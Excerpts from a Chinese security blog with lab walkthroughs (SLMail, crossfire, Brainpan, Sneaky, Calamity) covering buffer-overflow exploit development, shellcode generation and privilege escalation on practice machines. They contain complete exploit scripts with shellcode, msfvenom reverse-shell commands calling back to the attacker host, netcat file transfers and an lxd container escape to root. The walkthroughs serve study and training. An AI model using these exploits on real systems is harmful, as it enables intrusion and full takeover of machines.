发表于 | 分类于

本地查找exp

1
2
3
 
searchsploit slmail

locate /643.c

互联网上查找exp

可靠的经过验证的公开exp来源:

exp debug

由于软件版本等问题,exp可能会执行不成功。

要搭建对应的操作系统版本和有漏洞的软件,作为目标环境,来测试exp。测试exp能够成功执行以后,再在目标上运行。

通常,公开exp的shellcode并不能直接使用。shellcode可能会弹出计算器、绑定无效的IP反弹shell。

如果漏洞对buffer size不敏感,那么就可以将shellcode直接替换为我们的。如果漏洞对于缓冲区大小很敏感,那么简单的替换shellcode,可能会导致漏洞利用失败。

在更复杂的情况下,比如说exp要绕过DEP和ASLR溢出保护,那么替换shellcode的方式更起不到效果。

exp修改案例

mingw是一个跨平台编译器,可以将这个代码编译为windows PE 可执行格式,使用wine在kali上运行。

1
2
3
4
5
 
apt-get install mingw-w64

dpkg --add-architecture i386 && apt-get update 
apt-get install wine:i386
  • 目标ip: 192.168.1.101
  • kali ip: 192.168.1.100

编译643.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 
searchsploit slmail
locate /643.c
cp /usr/share/exploitdb/exploits/windows/remote/643.c .
该c代码有错误,无法正确编译
---
wget https://raw.githubusercontent.com/sevro/security-utilities/master/c/slmail_linux/643-fixed.c

---
将c代码中的shellcode替换一下,生成适合我们目标ip的shellcode:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"

---
目标ip替换一下:
    xs = conn("192.168.1.101");
---
编译:

gcc 643-fixed.c -o exp
chmod +x exp

nc -lnvp 443
./exp

10

编译646.c

https://raw.githubusercontent.com/sevro/security-utilities/master/c/slmail_windows/646-fixed.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
 
wget https://raw.githubusercontent.com/sevro/security-utilities/master/c/slmail_windows/646-fixed.c
---
修改exp的shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
---
编译
i686-w64-mingw32-gcc 646-fixed.c -lws2_32 -o 646.exe

#i686-w64-mingw32-gcc是编译win32位exe的编译器
#x86_64-w64-mingw32-gcc是编译win64位exe的编译器
#经过测试,kali是64位的,只有x86_64-w64-mingw32-gcc编译的64位exe,能够成功获得windows shell.

i686-w64-mingw32-gcc 646-fixed.c -lws2_32 -o 646.exe

x86_64-w64-mingw32-gcc 646-fixed.c -lws2_32 -o 646.exe
---
运行
wine 646.exe 192.168.1.101

11

阅读全文 »

发表于 | 分类于

参考资料:linux程序的常用保护机制

上一篇:crossfire&linux缓冲区溢出案例(三)

生成shellcode

上一篇找到了这些坏字符,在生成shellcode的时候必须避免这些字符出现\x00\x09\x0a\x20

1
2
3
4
5
6
7
 
[目标主机ip-linux] 192.168.67.128
[攻击机ip]         192.168.67.1

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b
"\x00\x09\x0a\x20" –e x86/shikata_ga_nai

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f python -b "\x00\x09\x0a\x20" –e x86/shikata_ga_nai

寻找返回地址

现在我们知道要到达ESP寄存器指向的缓冲区,我们需要找到一条指令,例如JMP ESP,它将把我们带到ESP寄存器指向的地址。

edb

Evans Debugger具有简单的操作码搜索功能。ctrl + o 快捷键搜索操作码

1
 
[目标机执行bof程序]edb --run /usr/games/crossfire/bin/crossfire

但是经过搜索,没有找到任何有效的跳转地址。怀疑是版本不是最新版,有bug,但是apt-get upgrade edb,报了错。

1
2
3
 
The following packages have unmet dependencies:
 emacs-common : Breaks: edb (< 1.32) but 1.31-3 is to be installed
E: Broken packages

放弃使用edb来查找跳转指令。

msfelfscan

如果运行msfelfscan提示命令未找到“ command not found”

1
2
 
cd /usr/bin
ln -s /usr/share/framework2/msfelfscan msfelfscan

msfelfscan -j esp -f /usr/games/crossfire/bin/crossfire

1
2
3
4
5
6
 
0x08134597   jmp esp
0x081345d7   jmp esp
0x08134727   jmp esp
0x081349c7   jmp esp
0x08134ad7   jmp esp
0x08134f87   jmp esp

exp

1
2
 
[攻击机执行命令] ./nc.exe -lnvp 4444
[攻击机] python exp.py

这是exp在栈中的执行流程。 1

debug

经过一些失败的尝试,crossfire程序还是没有成功反弹shell。 2

SIGSEGV是非法内存访问异常

同样的crossfire程序,同样的exp。在官方的给的虚拟机中可以成功溢出获得shell,但是在自己的x64位linux上不能。

官方给的靶机地址: pwk-kali-vm.7z

4

github上有人问了同样的问题,但是没有答案或者解决方案

checksec

3

1
2
3
4
5
6
7
8
9
10
11
12
 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable  FILE
No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   2262 Symbols     No     0               18      crossfire

RELRO: read only relocation 尽量减少可写的存储区域
STACK CANARY :栈保护
NX 将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令
PIE 地址空间分布随机化
RPATH  
RUNPATH     
Symbols        
FORTIFY Fortified       检查是否存在缓冲区溢出的错误
Fortifiable  FILE

运行crossfire的虚拟机

未成功的机器A: Linux kali 5.4.0-kali3-686-pae #1 SMP Debian 5.4.13-1kali1 (2020-01-20) i686 GNU/Linux

成功的虚拟机B: 5

B机器检查“地址空间分布随机化”后,发现是开启状态,可以确定运行失败的原因跟这个无关。

1
2
 
/proc/sys/kernel/randomize_va_space
2

6 在成功弹shell一次后,再次运行机器B的exp,溢出就无法成功了。

重启后,运行exp,就能成功弹shell。

推测是因为溢出改变了某个内存机制?知识的匮乏导致无法继续分析。

阅读全文 »

发表于 | 分类于

参考资料:Sneaky(suid+缓冲区溢出提权)

上一篇 得到了一个普通权限的shell,通过suid的缓冲区溢出漏洞,得到shell。这也不是第一次遇到了类似情况了。

文件传输

whereis gdb 结果显示客户机没有gdb,所以传输到kali上分析。

1
2
 
【目标机】nc -lnvp 8080 -w 5 < /usr/local/bin/validate
【kali】nc 192.168.67.130 8080  -w 5 > validate

分析程序

chmod a+x validate

让程序报错

1
2
3
4
 
gdb validate
run  $(python -c "print 'A'*500")  报错
run  $(python -c "print 'A'*250") 报错
run  $(python -c "print 'A'*100") 正常

直到找到恰当的长度

1
 
run  $(python -c "print 'A'*150") 报错

找到缓冲区长度116

1
2
 
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 150

3

0x39644138

1
2
3
 
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 150 -q 39644138

Exact match at offset 116

检查坏字符

遇到问题,不知道如何用gdb或者edb检查坏字符。思考后成功找到定位方法。

edb --run /root/Desktop/validate $(python badchar.py)

7 右下角堆栈面板,选中有很多A字符的地址,右键follow address in dump

9

A字符的末尾,可以看到01、02、03...输入的字符。可以看到08后面没有09,于是09是坏字符。 8

以此类推,检查的坏字符有\x09\x0a

badchar.py

1
2
 
print 'A'*116+"\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

msfelfscan

如果msfelfscan提示命令未找到。

1
2
 
cd /usr/bin
ln -s /usr/share/framework2/msfelfscan msfelfscan

再次输入msfelfscan -h,即可。

找到EIP跳转的地址

本来想找到JMP ESP栈顶的地址,但是没有找到。

4

生成shellcode

msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\x00\x09\x0a'

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
 
from struct import pack

buf =  b""
buf += b"\xb8\x76\x71\xc5\x28\xdb\xc5\xd9\x74\x24\xf4\x5d\x29"
buf += b"\xc9\xb1\x0b\x83\xc5\x04\x31\x45\x11\x03\x45\x11\xe2"
buf += b"\x83\x1b\xce\x70\xf2\x8e\xb6\xe8\x29\x4c\xbe\x0e\x59"
buf += b"\xbd\xb3\xb8\x99\xa9\x1c\x5b\xf0\x47\xea\x78\x50\x70"
buf += b"\xe4\x7e\x54\x80\xda\x1c\x3d\xee\x0b\x92\xd5\xee\x04"
buf += b"\x07\xac\x0e\x67\x27"

buffersize = 116      

nop = "\x90" * (buffersize - len(buf)) 
eax = pack('<L', 0x080484af)        
payload = buf + nop + eax 

print payload

文件传输

1
2
3
 
【目标机】nc -lnvp 8080 -w 5 > exp.py
【kali】nc 192.168.67.130 8080  -w 5 < exp.py
cd  /usr/local/bin/;./validate $(python /tmp/exp.py)

5

1
2
3
 
file /home/anansi/bin/anansi_util
/home/anansi/bin/anansi_util: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x7c0ee1e54fe059d0d83962304a6694199b6535b7, not stripped

6 sudo -l显示,sudo /home/anansi/bin/anansi_util 这个程序运行不需要密码,所以可以将/bin/bash添加到该程序,sudo以root权限运行该程序,最终获得root权限。

总结

  • msfelfscan用来找到EIP跳转的地址
  • msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\x00\x09\x0a'生成shellcode
  • payload = buf + nop + eax ,本次的返回地址是call eax,以前都是使用jmp esp。不太理解eax在这里起到的作用。等以后水平提升了再回头看看吧。
阅读全文 »

发表于 | 分类于

题外话:人生其实很简单,想要的就去争取,得到了就珍惜,失去了就忘记。

192.168.67.130

1
2
3
 
PORT      STATE SERVICE
9999/tcp  open  abyss 
10000/tcp open  snet-sensor-mgmt

3 http://192.168.67.130:10000

nc 192.168.67.130 9999

14

根据nc连接结果来看,brainpan.exe就是9999端口上运行的程序。 但是我们不知道密码,于是要通过逆向来获取。

brainpan.exe

file

1
2
 
file brainpan.exe 
brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

windows 32位程序

strings

strings brainpan.exe

查看程序的字符串,确认该程序就是目标主机9999端口运行的。

动态分析

本地windows机器做目标机,kali做攻击机。对程序进行动态调试。

windows主机,用调试器打开该程序 1

kali连接windows主机的9999端口 2

demo.py让程序报错

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 
#!/usr/bin/python
import socket

host = "192.168.67.1"

buffer = "A"*4000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."

s.connect((host, 9999))
data=s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent !"

4

d2.py 找到EIP

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4000运行该命令,生成4000字节字符串。

修改demo.py的这一行

1
 
buffer = "生成的字符串”

运行demo.py,得到报错的地址35724134 5

1
2
 
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 4000 -q 35724134
[*] Exact match at offset 524

d3.py 确认EIP

修改demo.py的这一行

1
 
buffer = "A"*524 + "B"*4

运行demo.py,确保EIP地址被B字符串覆盖。 6

d4.py 检查坏字符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
 
#!/usr/bin/python
import socket

host = "192.168.67.1"

badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

buffer = "A"*524 + badchars

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."

s.connect((host, 9999))
data=s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent !"

7

右上角寄存器面板,看到EDX寄存器的值为“AAAAAAAAAAAAAAAA…“,于是选中EDX,右键 follow in dump,左下角翻到A字符串的结尾。

查看发送的字符,从01开头,ff结尾,没有找到坏字符。一般来说\x00是坏字符,忘记加到字符里检查了,下次注意。

生成shellcode

nmap -O 192.168.67.130

8

这里有一点迷茫,因为IP为192.168.67.130的目标主机,看起来是个linux主机,但是运行的程序brainpan.exe却是一个windows 32的应用程序。

所以到底该生成linux的shellcode,还是windows的shellcode?

不管了,先生成windows的shellcode,在本地192.168.67.1的windows主机尝试是否能反弹shell吧。

1
2
3
 
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.67.128 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f c

生成了shellcode,注意去除坏字符\x00

找到JMP ESP

JMP ESP 是跳转到栈顶寄存器的汇编指令。 因为栈顶的内存地址是动态的,而程序的JMP ESP指令是相对固定的。 可以利用该指令来跳转到栈顶的位置。这可以方便我们定位内存地址,利于exp的编写。

1
2
3
4
5
 
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

JMP ESP

将汇编指令转换为十六进制的\xff\xe4

immunity debugger

1
2
3
4
5
 
!mona modules

!mona find -s "\xff\xe4" -m brainpan.exe

找到jmp esp指令的具体地址0x311712f3

9

d5.py

将上述得到的信息结合起来,EIP跳转地址——栈顶0x311712f3,栈长度524,没有坏字符的shellcode。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
 
#!/usr/bin/python
import socket
from struct import pack

host = "192.168.67.1"  #有bof漏洞的目标主机IP

shellcode ="\xba\x83\x2c\x49\xdd\xdb\xd8\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
shellcode +="\x52\x83\xc6\x04\x31\x56\x0e\x03\xd5\x22\xab\x28\x25\xd2\xa9"
shellcode +="\xd3\xd5\x23\xce\x5a\x30\x12\xce\x39\x31\x05\xfe\x4a\x17\xaa"
shellcode +="\x75\x1e\x83\x39\xfb\xb7\xa4\x8a\xb6\xe1\x8b\x0b\xea\xd2\x8a"
shellcode +="\x8f\xf1\x06\x6c\xb1\x39\x5b\x6d\xf6\x24\x96\x3f\xaf\x23\x05"
shellcode +="\xaf\xc4\x7e\x96\x44\x96\x6f\x9e\xb9\x6f\x91\x8f\x6c\xfb\xc8"
shellcode +="\x0f\x8f\x28\x61\x06\x97\x2d\x4c\xd0\x2c\x85\x3a\xe3\xe4\xd7"
shellcode +="\xc3\x48\xc9\xd7\x31\x90\x0e\xdf\xa9\xe7\x66\x23\x57\xf0\xbd"
shellcode +="\x59\x83\x75\x25\xf9\x40\x2d\x81\xfb\x85\xa8\x42\xf7\x62\xbe"
shellcode +="\x0c\x14\x74\x13\x27\x20\xfd\x92\xe7\xa0\x45\xb1\x23\xe8\x1e"
shellcode +="\xd8\x72\x54\xf0\xe5\x64\x37\xad\x43\xef\xda\xba\xf9\xb2\xb2"
shellcode +="\x0f\x30\x4c\x43\x18\x43\x3f\x71\x87\xff\xd7\x39\x40\x26\x20"
shellcode +="\x3d\x7b\x9e\xbe\xc0\x84\xdf\x97\x06\xd0\x8f\x8f\xaf\x59\x44"
shellcode +="\x4f\x4f\x8c\xcb\x1f\xff\x7f\xac\xcf\xbf\x2f\x44\x05\x30\x0f"
shellcode +="\x74\x26\x9a\x38\x1f\xdd\x4d\x87\x48\x9e\x0d\x6f\x8b\x20\x0f"
shellcode +="\xcb\x02\xc6\x65\x3b\x43\x51\x12\xa2\xce\x29\x83\x2b\xc5\x54"
shellcode +="\x83\xa0\xea\xa9\x4a\x41\x86\xb9\x3b\xa1\xdd\xe3\xea\xbe\xcb"
shellcode +="\x8b\x71\x2c\x90\x4b\xff\x4d\x0f\x1c\xa8\xa0\x46\xc8\x44\x9a"
shellcode +="\xf0\xee\x94\x7a\x3a\xaa\x42\xbf\xc5\x33\x06\xfb\xe1\x23\xde"
shellcode +="\x04\xae\x17\x8e\x52\x78\xc1\x68\x0d\xca\xbb\x22\xe2\x84\x2b"
shellcode +="\xb2\xc8\x16\x2d\xbb\x04\xe1\xd1\x0a\xf1\xb4\xee\xa3\x95\x30"
shellcode +="\x97\xd9\x05\xbe\x42\x5a\x35\xf5\xce\xcb\xde\x50\x9b\x49\x83"
shellcode +="\x62\x76\x8d\xba\xe0\x72\x6e\x39\xf8\xf7\x6b\x05\xbe\xe4\x01"
shellcode +="\x16\x2b\x0a\xb5\x17\x7e"

buffersize = 524

eip = pack('<L', 0x311712f3)
buffer = "\x41"*buffersize + eip + "\x90" *16+shellcode 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
print len(shellcode)
s.connect((host, 9999))
data=s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent !"

10

执行后成功反弹shell。原理就不解释了,看以前的文章。

d6.py

在本地windows运行成功后,把shellcode改为linux的

msfvenom -l payload grep linux 
1
2
3
 
LHOST是kali的IP
LHOST是kali的监听端口
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.67.128 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f c

11 成功进行栈溢出。

wine

cat /home/puck/*.sh

1
2
3
4
5
6
7
8
9
10
11
 
if [[ $? -eq 1 ]]; then 
	pid=`ps aux | grep brainpan.exe | grep -v grep`
	if [[ ! -z $pid ]]; then
		kill -9 $pid
		killall wineserver
		killall winedevice.exe
	fi
	/usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi 

可以看到使用wine,在linux平台执行了exe程序

suid提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
 
python -c 'import pty; pty.spawn("/bin/bash")'
---
find / -perm -4000 2>/dev/null
查看有suid权限的程序
---
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util

file /home/anansi/bin/anansi_util
无权限查看
---
sh /home/anansi/bin/anansi_util
sh: 0: Can't open /home/anansi/bin/anansi_util
---
cd /home/anansi
无权限
---
cat /etc/passwd | grep home

reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
找到三个普通用户
---
file /usr/local/bin/validate
cd /usr/local/bin;./validate

结果
validating input...passed.

无论输入什么,都显示上述一行,经过测试它有溢出错误。 详情看下一篇文章

阅读全文 »

发表于 | 分类于

上一篇:Calamity(web rce)

Calamity(lxd之linux容器错误权限的提权)

参考资料:

1
2
 
ssh xalvas@10.10.10.27
18547936..*

得到一个用户权限的shell

lxd提权

https://reboare.github.io/lxd/lxd-escape.html

【kali运行】

1
2
3
4
5
6
7
 
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder;./build-alpine -a i686
#该步骤下载一个lxd容器模板

scp alpine-v3.11-i686-20200109_0853.tar.gz xalvas@10.10.10.27:/tmp/
18547936..*
#将容器模板复制到目标机

【目标shell运行】

1
2
3
4
5
6
7
8
9
 
lxc image import alpine-v3.11-i686-20200109_0853.tar.gz --alias=alpine

lxc init alpine alpsarecold -c security.privileged=true

lxc config device add alpsarecold somedisk disk source=/ path=/mnt/root recursive=true 

lxc exec alpsarecold --mode=interactive /bin/sh
运行后,即获得

提权原理

lxd是ubuntu容器管理软件,可以看作和docker一样。

lxd组和docker组一样,有不安全的地方。

本地容器的普通用户在任何情况下都不应该被允许访问lxd,因为这样十分容易被入侵。

首先,我将检查您的用户是否是该组的成员,因为如果您安装了该用户并且是sudoer,则很可能是您。 安装后,lxd会自动将每个用户添加到lxd组中。考虑到sudoer自动具有root访问权限,这可以认为是可以的,但它忘记了sudo具有适当的审核功能,并且确实需要密码来执行root所需的任何操作。 实际上,仅安装lxd等效于在sudoers文件中添加以下内容。

1
 
admin    ALL=NOPASSWD: ALL

如果某人获得了对管理员帐户的访问权限,那么他们将立即获得完全的root访问权限,而无需输入密码。 考虑一个ssh私钥逃逸到该用户下运行的野外服务或过时的服务,突然之间,一个仍然没有破解admin帐户密码的攻击者就具有完全的root访问权,这都是因为您安装了lxd。

我并不是在反对lxd组的存在,只是在不通知用户的情况下增加了攻击面。 发现此问题的原因在于用户没有意识到该组赋予其帐户的权力, 并且在删除了sudo特权的同时,没有进行lxd访问。

lcd运行用户使用全部权限,无需使用sudo 而lxd必需要root权限来执行程序。所以可以通过lcd来提权。

阅读全文 »